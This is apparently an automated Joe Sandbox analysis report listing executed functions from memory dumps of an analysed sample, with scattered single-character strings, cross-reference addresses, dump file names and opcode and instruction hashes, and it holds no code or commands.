Total number of Limit Nodes:	0

Executed Functions

Function 05B69C92 Relevance: 84.6, Strings: 67, Instructions: 809
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

A, xrefs: 05B6A6B1
b, xrefs: 05B6A93B
[, xrefs: 05B6A9F0
[, xrefs: 05B6A833
*, xrefs: 05B6A2D8
X, xrefs: 05B69F00
8, xrefs: 05B6A553
@, xrefs: 05B6A042
;, xrefs: 05B6A6A7
U, xrefs: 05B6A139
#A, xrefs: 05B6A606
H, xrefs: 05B6A1B4
L, xrefs: 05B6A0E7
\, xrefs: 05B6A2F6
9, xrefs: 05B6A88D
$, xrefs: 05B69E03
1, xrefs: 05B6A312
L, xrefs: 05B6A6BB
2, xrefs: 05B6AA1D
^, xrefs: 05B6A140
/, xrefs: 05B6AADF
@x(B, xrefs: 05B6A628
a, xrefs: 05B69F54
9, xrefs: 05B6A7EB
?, xrefs: 05B6A038
J, xrefs: 05B6A7F5
#, xrefs: 05B6A94F
$, xrefs: 05B6A3A8
], xrefs: 05B6A7E1
5, xrefs: 05B69EC8
`, xrefs: 05B69E62
H, xrefs: 05B6A75C
/, xrefs: 05B6A567
W, xrefs: 05B69EF6
P, xrefs: 05B6A4FA
=, xrefs: 05B6AA81
J, xrefs: 05B69E0D
G, xrefs: 05B6A5E8
), xrefs: 05B6A871
!, xrefs: 05B6AAD5
MA, xrefs: 05B6A25F
T, xrefs: 05B6AAE9
M, xrefs: 05B6A300
6, xrefs: 05B6A9DA
#, xrefs: 05B6AACB
', xrefs: 05B6A1DE
^, xrefs: 05B6A01A
Q, xrefs: 05B6AB0D
2, xrefs: 05B6A549
%, xrefs: 05B6A796
T, xrefs: 05B6AAB7
", xrefs: 05B6A55D
rL2@, xrefs: 05B6A174
$, xrefs: 05B6A883
`, xrefs: 05B6A43B
W, xrefs: 05B6A7C1
a, xrefs: 05B6A459
T, xrefs: 05B69E86
N, xrefs: 05B6A0BB
Y, xrefs: 05B6AB2D
@, xrefs: 05B6A37C
I, xrefs: 05B6A64C
2, xrefs: 05B6A4B0
2, xrefs: 05B6A4A6
/, xrefs: 05B6AA50
X, xrefs: 05B6A403
S, xrefs: 05B6A386

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: !$"$#$#$$$$$$$%$'$)$*$/$/$/$1$2$2$2$2$5$6$8$9$9$;$=$?$@$@$@x(B$A$G$H$H$I$J$J$L$L$M$MA$N$P$Q$S$T$T$T$U$W$W$X$X$Y$[$[$\$]$^$^$`$`$a$a$b$rL2@$#A
API String ID: 0-1529840648
Opcode ID: 6c00ea203bc31cfff4cc2fb0862f7291d081ea9f6b91ce20f6545ac45a89ecde
Instruction ID: a35e4f0c63f4f685be2a1946478ba9a743dfe1c316e78f777772fd78bc52bb8b
Opcode Fuzzy Hash: 6c00ea203bc31cfff4cc2fb0862f7291d081ea9f6b91ce20f6545ac45a89ecde
Instruction Fuzzy Hash: D6A290B0D41A298FEB64CF1ADD4479ABBF6FB48305F1091EA940CA7350EB795E858F00

Function 05B69C98 Relevance: 84.6, Strings: 67, Instructions: 807
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

A, xrefs: 05B6A6B1
b, xrefs: 05B6A93B
[, xrefs: 05B6A9F0
[, xrefs: 05B6A833
*, xrefs: 05B6A2D8
X, xrefs: 05B69F00
8, xrefs: 05B6A553
@, xrefs: 05B6A042
;, xrefs: 05B6A6A7
U, xrefs: 05B6A139
#A, xrefs: 05B6A606
H, xrefs: 05B6A1B4
L, xrefs: 05B6A0E7
\, xrefs: 05B6A2F6
9, xrefs: 05B6A88D
$, xrefs: 05B69E03
1, xrefs: 05B6A312
L, xrefs: 05B6A6BB
2, xrefs: 05B6AA1D
^, xrefs: 05B6A140
/, xrefs: 05B6AADF
@x(B, xrefs: 05B6A628
a, xrefs: 05B69F54
9, xrefs: 05B6A7EB
?, xrefs: 05B6A038
J, xrefs: 05B6A7F5
#, xrefs: 05B6A94F
$, xrefs: 05B6A3A8
], xrefs: 05B6A7E1
5, xrefs: 05B69EC8
`, xrefs: 05B69E62
H, xrefs: 05B6A75C
/, xrefs: 05B6A567
W, xrefs: 05B69EF6
P, xrefs: 05B6A4FA
=, xrefs: 05B6AA81
J, xrefs: 05B69E0D
G, xrefs: 05B6A5E8
), xrefs: 05B6A871
!, xrefs: 05B6AAD5
MA, xrefs: 05B6A25F
T, xrefs: 05B6AAE9
M, xrefs: 05B6A300
6, xrefs: 05B6A9DA
#, xrefs: 05B6AACB
', xrefs: 05B6A1DE
^, xrefs: 05B6A01A
Q, xrefs: 05B6AB0D
2, xrefs: 05B6A549
%, xrefs: 05B6A796
T, xrefs: 05B6AAB7
", xrefs: 05B6A55D
rL2@, xrefs: 05B6A174
$, xrefs: 05B6A883
`, xrefs: 05B6A43B
W, xrefs: 05B6A7C1
a, xrefs: 05B6A459
T, xrefs: 05B69E86
N, xrefs: 05B6A0BB
Y, xrefs: 05B6AB2D
@, xrefs: 05B6A37C
I, xrefs: 05B6A64C
2, xrefs: 05B6A4B0
2, xrefs: 05B6A4A6
/, xrefs: 05B6AA50
X, xrefs: 05B6A403
S, xrefs: 05B6A386

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: !$"$#$#$$$$$$$%$'$)$*$/$/$/$1$2$2$2$2$5$6$8$9$9$;$=$?$@$@$@x(B$A$G$H$H$I$J$J$L$L$M$MA$N$P$Q$S$T$T$T$U$W$W$X$X$Y$[$[$\$]$^$^$`$`$a$a$b$rL2@$#A
API String ID: 0-1529840648
Opcode ID: 814c2061e49db4ce203721ea019c4cd6b6960e44ea97a6daf694d010ae2e92e0
Instruction ID: 59dbd5bdf36b9b2ec4411b4f9c58bf95d33269940e3037a2180fabc15158cac4
Opcode Fuzzy Hash: 814c2061e49db4ce203721ea019c4cd6b6960e44ea97a6daf694d010ae2e92e0
Instruction Fuzzy Hash: 2AA280B0D41A298FEB64CF1ADD4479ABBF6FB48305F1091EA950CA7350EB795E858F00

Function 05B62C08 Relevance: 84.5, Strings: 67, Instructions: 761
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H, xrefs: 05B63704
Y, xrefs: 05B63AD2
J, xrefs: 05B6379D
9, xrefs: 05B6382F
=, xrefs: 05B63A29
Q, xrefs: 05B63AB2
A, xrefs: 05B6365C
!, xrefs: 05B63A7D
L, xrefs: 05B63092
T, xrefs: 05B63A62
[, xrefs: 05B637DB
`, xrefs: 05B633DD
/, xrefs: 05B6350F
a, xrefs: 05B633F8
", xrefs: 05B63505
@x(B, xrefs: 05B635D6
T, xrefs: 05B63A91
@, xrefs: 05B62FF0
S, xrefs: 05B6332E
G, xrefs: 05B63599
5, xrefs: 05B62E70
X, xrefs: 05B633A8
rL2@, xrefs: 05B63122
N, xrefs: 05B63069
J, xrefs: 05B62DB8
8, xrefs: 05B634FB
9, xrefs: 05B63793
2, xrefs: 05B63445
T, xrefs: 05B62E31
$, xrefs: 05B6334D
MA, xrefs: 05B6320A
*, xrefs: 05B63286
', xrefs: 05B63189
;, xrefs: 05B63652
^, xrefs: 05B630EE
2, xrefs: 05B6344F
2, xrefs: 05B634F1
?, xrefs: 05B62FE6
$, xrefs: 05B62DAE
$, xrefs: 05B63828
X, xrefs: 05B62EA8
b, xrefs: 05B638DD
], xrefs: 05B6378C
#, xrefs: 05B638EE
2, xrefs: 05B639BF
#, xrefs: 05B63A73
#A, xrefs: 05B635B7
W, xrefs: 05B6376C
`, xrefs: 05B62E0D
U, xrefs: 05B630E4
^, xrefs: 05B62FC8
L, xrefs: 05B63663
M, xrefs: 05B632AE
/, xrefs: 05B639F5
P, xrefs: 05B6349F
I, xrefs: 05B635F7
[, xrefs: 05B6398F
1, xrefs: 05B632BD
6, xrefs: 05B63979
%, xrefs: 05B6373E
W, xrefs: 05B62E9E
a, xrefs: 05B62EFC
), xrefs: 05B63816
H, xrefs: 05B6315F
\, xrefs: 05B632A4
/, xrefs: 05B63A87
@, xrefs: 05B63324

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: !$"$#$#$$$$$$$%$'$)$*$/$/$/$1$2$2$2$2$5$6$8$9$9$;$=$?$@$@$@x(B$A$G$H$H$I$J$J$L$L$M$MA$N$P$Q$S$T$T$T$U$W$W$X$X$Y$[$[$\$]$^$^$`$`$a$a$b$rL2@$#A
API String ID: 0-1529840648
Opcode ID: 9ac4c0dc9755e4c2edd03b7eb465d6c1c97ac50b4ecb82e4af8030335c9f92c1
Instruction ID: e395860e498b0356a5804fa3c22e6f3cf97a400aab5bf48924796086bd15f7ea
Opcode Fuzzy Hash: 9ac4c0dc9755e4c2edd03b7eb465d6c1c97ac50b4ecb82e4af8030335c9f92c1
Instruction Fuzzy Hash: D0A291B0D01A298FDB64CF1ADE4479ABBB6FB48305F1091E9951CA7250EB7A5EC5CF00

Function 05B62C18 Relevance: 84.5, Strings: 67, Instructions: 756
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H, xrefs: 05B63704
Y, xrefs: 05B63AD2
J, xrefs: 05B6379D
9, xrefs: 05B6382F
=, xrefs: 05B63A29
Q, xrefs: 05B63AB2
A, xrefs: 05B6365C
!, xrefs: 05B63A7D
L, xrefs: 05B63092
T, xrefs: 05B63A62
[, xrefs: 05B637DB
`, xrefs: 05B633DD
/, xrefs: 05B6350F
a, xrefs: 05B633F8
", xrefs: 05B63505
@x(B, xrefs: 05B635D6
T, xrefs: 05B63A91
@, xrefs: 05B62FF0
S, xrefs: 05B6332E
G, xrefs: 05B63599
5, xrefs: 05B62E70
X, xrefs: 05B633A8
rL2@, xrefs: 05B63122
N, xrefs: 05B63069
J, xrefs: 05B62DB8
8, xrefs: 05B634FB
9, xrefs: 05B63793
2, xrefs: 05B63445
T, xrefs: 05B62E31
$, xrefs: 05B6334D
MA, xrefs: 05B6320A
*, xrefs: 05B63286
', xrefs: 05B63189
;, xrefs: 05B63652
^, xrefs: 05B630EE
2, xrefs: 05B6344F
2, xrefs: 05B634F1
?, xrefs: 05B62FE6
$, xrefs: 05B62DAE
$, xrefs: 05B63828
X, xrefs: 05B62EA8
b, xrefs: 05B638DD
], xrefs: 05B6378C
#, xrefs: 05B638EE
2, xrefs: 05B639BF
#, xrefs: 05B63A73
#A, xrefs: 05B635B7
W, xrefs: 05B6376C
`, xrefs: 05B62E0D
U, xrefs: 05B630E4
^, xrefs: 05B62FC8
L, xrefs: 05B63663
M, xrefs: 05B632AE
/, xrefs: 05B639F5
P, xrefs: 05B6349F
I, xrefs: 05B635F7
[, xrefs: 05B6398F
1, xrefs: 05B632BD
6, xrefs: 05B63979
%, xrefs: 05B6373E
W, xrefs: 05B62E9E
a, xrefs: 05B62EFC
), xrefs: 05B63816
H, xrefs: 05B6315F
\, xrefs: 05B632A4
/, xrefs: 05B63A87
@, xrefs: 05B63324

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: !$"$#$#$$$$$$$%$'$)$*$/$/$/$1$2$2$2$2$5$6$8$9$9$;$=$?$@$@$@x(B$A$G$H$H$I$J$J$L$L$M$MA$N$P$Q$S$T$T$T$U$W$W$X$X$Y$[$[$\$]$^$^$`$`$a$a$b$rL2@$#A
API String ID: 0-1529840648
Opcode ID: 83e3a8c333908943424e379fb9fea506215c6e9cbdc56b155a7a28607c1653b3
Instruction ID: b8db691c62d9d1c66174de849ac8f75110ec709996f2080a61fad9e02af34fdb
Opcode Fuzzy Hash: 83e3a8c333908943424e379fb9fea506215c6e9cbdc56b155a7a28607c1653b3
Instruction Fuzzy Hash: 87A281B0D01A298FDB64CF1ADE4479ABBB6FB48305F1091E9951CA7250EB7A5EC5CF00

Function 05B65568 Relevance: 84.5, Strings: 67, Instructions: 745
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

MA, xrefs: 05B65B96
#A, xrefs: 05B65F40
8, xrefs: 05B65E84
/, xrefs: 05B6641F
T, xrefs: 05B66429
J, xrefs: 05B6612F
#, xrefs: 05B6640E
a, xrefs: 05B65D84
2, xrefs: 05B65DD1
T, xrefs: 05B657C6
9, xrefs: 05B66125
1, xrefs: 05B65C43
H, xrefs: 05B65AE2
;, xrefs: 05B65FE1
b, xrefs: 05B66275
", xrefs: 05B65E8E
9, xrefs: 05B661C4
@, xrefs: 05B65973
H, xrefs: 05B66096
$, xrefs: 05B65743
$, xrefs: 05B661BA
A, xrefs: 05B65FEB
\, xrefs: 05B65C27
@, xrefs: 05B65CAD
/, xrefs: 05B65E98
^, xrefs: 05B6594B
2, xrefs: 05B65DDB
M, xrefs: 05B65C31
W, xrefs: 05B660FB
rL2@, xrefs: 05B65AA2
J, xrefs: 05B6574A
/, xrefs: 05B6638D
a, xrefs: 05B6588B
%, xrefs: 05B660D0
W, xrefs: 05B65830
Q, xrefs: 05B6644D
`, xrefs: 05B65D69
S, xrefs: 05B65CB7
$, xrefs: 05B65CD9
], xrefs: 05B6611B
X, xrefs: 05B6583A
U, xrefs: 05B65A64
X, xrefs: 05B65D34
G, xrefs: 05B65F22
N, xrefs: 05B659E9
`, xrefs: 05B657A2
2, xrefs: 05B66357
Y, xrefs: 05B6646D
I, xrefs: 05B65F86
[, xrefs: 05B6632A
L, xrefs: 05B65FF2
P, xrefs: 05B65E2B
2, xrefs: 05B65E7A
6, xrefs: 05B66314
=, xrefs: 05B663BE
^, xrefs: 05B65A6E
@x(B, xrefs: 05B65F62
[, xrefs: 05B6616D
), xrefs: 05B661A8
*, xrefs: 05B65C0C
L, xrefs: 05B65A15
', xrefs: 05B65B0C
5, xrefs: 05B65802
!, xrefs: 05B66418
T, xrefs: 05B663FA
#, xrefs: 05B66289
?, xrefs: 05B65969

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: !$"$#$#$$$$$$$%$'$)$*$/$/$/$1$2$2$2$2$5$6$8$9$9$;$=$?$@$@$@x(B$A$G$H$H$I$J$J$L$L$M$MA$N$P$Q$S$T$T$T$U$W$W$X$X$Y$[$[$\$]$^$^$`$`$a$a$b$rL2@$#A
API String ID: 0-1529840648
Opcode ID: adaadc81d0ed15e777cff28657b41054051f8a8c15b5234d85fc6290e5578d72
Instruction ID: 7c2fa6e34bc006e1133550796a3a9c401835f4dafc2ba83b53bd0d70eef2c52c
Opcode Fuzzy Hash: adaadc81d0ed15e777cff28657b41054051f8a8c15b5234d85fc6290e5578d72
Instruction Fuzzy Hash: 69A292B1D41A298FEB64CF1ACD44799BBF6FF88305F0491EA950CA7250EB794E858F04

Function 05B65578 Relevance: 84.5, Strings: 67, Instructions: 740
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

MA, xrefs: 05B65B96
#A, xrefs: 05B65F40
8, xrefs: 05B65E84
/, xrefs: 05B6641F
T, xrefs: 05B66429
J, xrefs: 05B6612F
#, xrefs: 05B6640E
a, xrefs: 05B65D84
2, xrefs: 05B65DD1
T, xrefs: 05B657C6
9, xrefs: 05B66125
1, xrefs: 05B65C43
H, xrefs: 05B65AE2
;, xrefs: 05B65FE1
b, xrefs: 05B66275
", xrefs: 05B65E8E
9, xrefs: 05B661C4
@, xrefs: 05B65973
H, xrefs: 05B66096
$, xrefs: 05B65743
$, xrefs: 05B661BA
A, xrefs: 05B65FEB
\, xrefs: 05B65C27
@, xrefs: 05B65CAD
/, xrefs: 05B65E98
^, xrefs: 05B6594B
2, xrefs: 05B65DDB
M, xrefs: 05B65C31
W, xrefs: 05B660FB
rL2@, xrefs: 05B65AA2
J, xrefs: 05B6574A
/, xrefs: 05B6638D
a, xrefs: 05B6588B
%, xrefs: 05B660D0
W, xrefs: 05B65830
Q, xrefs: 05B6644D
`, xrefs: 05B65D69
S, xrefs: 05B65CB7
$, xrefs: 05B65CD9
], xrefs: 05B6611B
X, xrefs: 05B6583A
U, xrefs: 05B65A64
X, xrefs: 05B65D34
G, xrefs: 05B65F22
N, xrefs: 05B659E9
`, xrefs: 05B657A2
2, xrefs: 05B66357
Y, xrefs: 05B6646D
I, xrefs: 05B65F86
[, xrefs: 05B6632A
L, xrefs: 05B65FF2
P, xrefs: 05B65E2B
2, xrefs: 05B65E7A
6, xrefs: 05B66314
=, xrefs: 05B663BE
^, xrefs: 05B65A6E
@x(B, xrefs: 05B65F62
[, xrefs: 05B6616D
), xrefs: 05B661A8
*, xrefs: 05B65C0C
L, xrefs: 05B65A15
', xrefs: 05B65B0C
5, xrefs: 05B65802
!, xrefs: 05B66418
T, xrefs: 05B663FA
#, xrefs: 05B66289
?, xrefs: 05B65969

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: !$"$#$#$$$$$$$%$'$)$*$/$/$/$1$2$2$2$2$5$6$8$9$9$;$=$?$@$@$@x(B$A$G$H$H$I$J$J$L$L$M$MA$N$P$Q$S$T$T$T$U$W$W$X$X$Y$[$[$\$]$^$^$`$`$a$a$b$rL2@$#A
API String ID: 0-1529840648
Opcode ID: 8c9f641bd7c10ebb3406111df0c9f72653713991a8019f8641f0f9106411e12b
Instruction ID: 849d354ef56c5d0e73bba86e401d8dbd61cb87f6e3c0d735b8c130550680431e
Opcode Fuzzy Hash: 8c9f641bd7c10ebb3406111df0c9f72653713991a8019f8641f0f9106411e12b
Instruction Fuzzy Hash: 4B9281B1D41A298FEB64CF1ACD44799BBF6FF88305F0491EA950CA7250EB794E858F04

Function 05B66770 Relevance: 84.4, Strings: 67, Instructions: 695
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

*, xrefs: 05B66E85
rL2@, xrefs: 05B66D1E
8, xrefs: 05B670F1
2, xrefs: 05B675C1
6, xrefs: 05B6757B
J, xrefs: 05B6739C
T, xrefs: 05B67667
^, xrefs: 05B66BC7
A, xrefs: 05B67255
$, xrefs: 05B67424
`, xrefs: 05B66A12
P, xrefs: 05B6709B
/, xrefs: 05B67105
2, xrefs: 05B67047
?, xrefs: 05B66BE5
MA, xrefs: 05B66E0C
=, xrefs: 05B6762B
N, xrefs: 05B66C68
', xrefs: 05B66D82
@x(B, xrefs: 05B671CC
S, xrefs: 05B66F2D
T, xrefs: 05B66A33
), xrefs: 05B67415
X, xrefs: 05B66FA7
W, xrefs: 05B67368
%, xrefs: 05B6733D
@, xrefs: 05B66BEF
$, xrefs: 05B669B0
U, xrefs: 05B66CE3
\, xrefs: 05B66EA0
;, xrefs: 05B6724B
L, xrefs: 05B6725F
T, xrefs: 05B67699
[, xrefs: 05B67591
/, xrefs: 05B675F7
I, xrefs: 05B671F0
!, xrefs: 05B67685
], xrefs: 05B67388
W, xrefs: 05B66AA0
9, xrefs: 05B67392
9, xrefs: 05B6742E
^, xrefs: 05B66CED
[, xrefs: 05B673DA
@, xrefs: 05B66F23
/, xrefs: 05B6768F
$, xrefs: 05B66F4C
5, xrefs: 05B66A72
J, xrefs: 05B669BA
a, xrefs: 05B66AFE
`, xrefs: 05B66FDC
G, xrefs: 05B6718F
#, xrefs: 05B674ED
2, xrefs: 05B67051
", xrefs: 05B670FB
1, xrefs: 05B66EBC
Y, xrefs: 05B676DD
X, xrefs: 05B66AAA
L, xrefs: 05B66C91
H, xrefs: 05B66D58
Q, xrefs: 05B676BD
M, xrefs: 05B66EAA
a, xrefs: 05B66FFA
H, xrefs: 05B67303
#, xrefs: 05B6767B
b, xrefs: 05B674DC
2, xrefs: 05B670EA
#A, xrefs: 05B671AA

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: !$"$#$#$$$$$$$%$'$)$*$/$/$/$1$2$2$2$2$5$6$8$9$9$;$=$?$@$@$@x(B$A$G$H$H$I$J$J$L$L$M$MA$N$P$Q$S$T$T$T$U$W$W$X$X$Y$[$[$\$]$^$^$`$`$a$a$b$rL2@$#A
API String ID: 0-1529840648
Opcode ID: 29505ede6dfa406dddb4d37adfca8c091ee8d41ac808c52f6d9d5a3e5af38c60
Instruction ID: 7a2f93e83055ff76d79ec6168db34032bd41e7009a67064597cbe437e3e27532
Opcode Fuzzy Hash: 29505ede6dfa406dddb4d37adfca8c091ee8d41ac808c52f6d9d5a3e5af38c60
Instruction Fuzzy Hash: 8F9280B1D016298FEB64CF1ACE44799BBF6FF88305F0581EA951CAB250E7794AC58F04

Function 05B66780 Relevance: 84.4, Strings: 67, Instructions: 692
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

*, xrefs: 05B66E85
rL2@, xrefs: 05B66D1E
8, xrefs: 05B670F1
2, xrefs: 05B675C1
6, xrefs: 05B6757B
J, xrefs: 05B6739C
T, xrefs: 05B67667
^, xrefs: 05B66BC7
A, xrefs: 05B67255
$, xrefs: 05B67424
`, xrefs: 05B66A12
P, xrefs: 05B6709B
/, xrefs: 05B67105
2, xrefs: 05B67047
?, xrefs: 05B66BE5
MA, xrefs: 05B66E0C
=, xrefs: 05B6762B
N, xrefs: 05B66C68
', xrefs: 05B66D82
@x(B, xrefs: 05B671CC
S, xrefs: 05B66F2D
T, xrefs: 05B66A33
), xrefs: 05B67415
X, xrefs: 05B66FA7
W, xrefs: 05B67368
%, xrefs: 05B6733D
@, xrefs: 05B66BEF
$, xrefs: 05B669B0
U, xrefs: 05B66CE3
\, xrefs: 05B66EA0
;, xrefs: 05B6724B
L, xrefs: 05B6725F
T, xrefs: 05B67699
[, xrefs: 05B67591
/, xrefs: 05B675F7
I, xrefs: 05B671F0
!, xrefs: 05B67685
], xrefs: 05B67388
W, xrefs: 05B66AA0
9, xrefs: 05B67392
9, xrefs: 05B6742E
^, xrefs: 05B66CED
[, xrefs: 05B673DA
@, xrefs: 05B66F23
/, xrefs: 05B6768F
$, xrefs: 05B66F4C
5, xrefs: 05B66A72
J, xrefs: 05B669BA
a, xrefs: 05B66AFE
`, xrefs: 05B66FDC
G, xrefs: 05B6718F
#, xrefs: 05B674ED
2, xrefs: 05B67051
", xrefs: 05B670FB
1, xrefs: 05B66EBC
Y, xrefs: 05B676DD
X, xrefs: 05B66AAA
L, xrefs: 05B66C91
H, xrefs: 05B66D58
Q, xrefs: 05B676BD
M, xrefs: 05B66EAA
a, xrefs: 05B66FFA
H, xrefs: 05B67303
#, xrefs: 05B6767B
b, xrefs: 05B674DC
2, xrefs: 05B670EA
#A, xrefs: 05B671AA

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: !$"$#$#$$$$$$$%$'$)$*$/$/$/$1$2$2$2$2$5$6$8$9$9$;$=$?$@$@$@x(B$A$G$H$H$I$J$J$L$L$M$MA$N$P$Q$S$T$T$T$U$W$W$X$X$Y$[$[$\$]$^$^$`$`$a$a$b$rL2@$#A
API String ID: 0-1529840648
Opcode ID: b4b21ee3e9b9f4511a29746b31ef2e7ea5651b13c65cb9e9b35bc95d62bedced
Instruction ID: a8c8282020fb42b1555c10c87ce8701d1224993480c24804107cf3c2ea203c0c
Opcode Fuzzy Hash: b4b21ee3e9b9f4511a29746b31ef2e7ea5651b13c65cb9e9b35bc95d62bedced
Instruction Fuzzy Hash: 9A9280B1D016298FEB64CF1ACE44799BBF6FF88305F0481EA951CA7250EB794AC58F04

Function 06051B10 Relevance: 6.7, Strings: 5, Instructions: 409
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 06054C67
Xz^q, xrefs: 06054AF2
i, xrefs: 06051B5B
Xz^q, xrefs: 06054A42
Te^q, xrefs: 06051B37

Memory Dump Source

Source File: 00000000.00000002.1684963539.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6050000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: Te^q$Te^q$Xz^q$Xz^q$i
API String ID: 0-2391991066
Opcode ID: ff3e160fbd250debde3e0135b40eec877483e017f9f3bd5e663e2625e76dea89
Instruction ID: b4e2978748162f0ecdcfabb2792b846f129e3bf40fdc005ecbfc625e56bf416a
Opcode Fuzzy Hash: ff3e160fbd250debde3e0135b40eec877483e017f9f3bd5e663e2625e76dea89
Instruction Fuzzy Hash: 92228174D452688FDBA4DF29D984AD9BBF1FB48301F0081EAE80DA7250DB35AE91CF40

Function 06053036 Relevance: 5.4, Strings: 4, Instructions: 369
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 06054C67
Xz^q, xrefs: 06054AF2
H, xrefs: 0605308D
Xz^q, xrefs: 06054A42

Memory Dump Source

Source File: 00000000.00000002.1684963539.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6050000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: H$Te^q$Xz^q$Xz^q
API String ID: 0-359572378
Opcode ID: 4645e0c322dd0593ea099048ccc2782a6f69412662a147c32dd43ad151af4588
Instruction ID: adcf15cac0dbd645e8dd53bc4790cc816956b3cec24a14e9e580fa6963a84f0d
Opcode Fuzzy Hash: 4645e0c322dd0593ea099048ccc2782a6f69412662a147c32dd43ad151af4588
Instruction Fuzzy Hash: 16127274D452698FDBA4DF28D984AD9BBF2FB88300F1045E9E90DA7250DB35AE91CF40

Function 06053201 Relevance: 4.1, Strings: 3, Instructions: 348
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 06054C67
Xz^q, xrefs: 06054AF2
Xz^q, xrefs: 06054A42

Memory Dump Source

Source File: 00000000.00000002.1684963539.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6050000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: Te^q$Xz^q$Xz^q
API String ID: 0-2008720192
Opcode ID: 274ce25306461e6583827edf0cc8f920ef39cbaa18b44b40115ef9901a21139e
Instruction ID: 1432c8e86bf88f5824d1e45cd92f033be329f0faa779f076a5260f2c11fca0a0
Opcode Fuzzy Hash: 274ce25306461e6583827edf0cc8f920ef39cbaa18b44b40115ef9901a21139e
Instruction Fuzzy Hash: 6E128374D452688FDB64DF28D985AD9BBF2FB88300F1081EAD90DA7250DB35AE91CF40

Function 0313EF68 Relevance: 1.8, Strings: 1, Instructions: 578
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(, xrefs: 0313F6BC

Memory Dump Source

Source File: 00000000.00000002.1669415902.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3130000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 5b562fd418e358caf60f2925281622350521be247755d4b286d53df59e244729
Instruction ID: 5c9becc72f4841a81dee85f2a97a3c097eec7c226e890a92cd8ec9e75e9c8a68
Opcode Fuzzy Hash: 5b562fd418e358caf60f2925281622350521be247755d4b286d53df59e244729
Instruction Fuzzy Hash: 5952BF74D002288FDB68DF65C994BEDBBB2BB89304F1481EAD40DAB255DB315E86CF50

Function 05B63E40 Relevance: 6.0, Strings: 4, Instructions: 1024
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Z<.B, xrefs: 05B64E63
[LGB, xrefs: 05B642C8
H5B, xrefs: 05B6425F
F@, xrefs: 05B64165

Memory Dump Source

Source File: 00000000.00000002.1679424042.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_1lKbb2hF7fYToopfpmEvlyRN.jbxd

Similarity

API ID:
String ID: Z<.B$[LGB$F@$H5B
API String ID: 0-4264506516
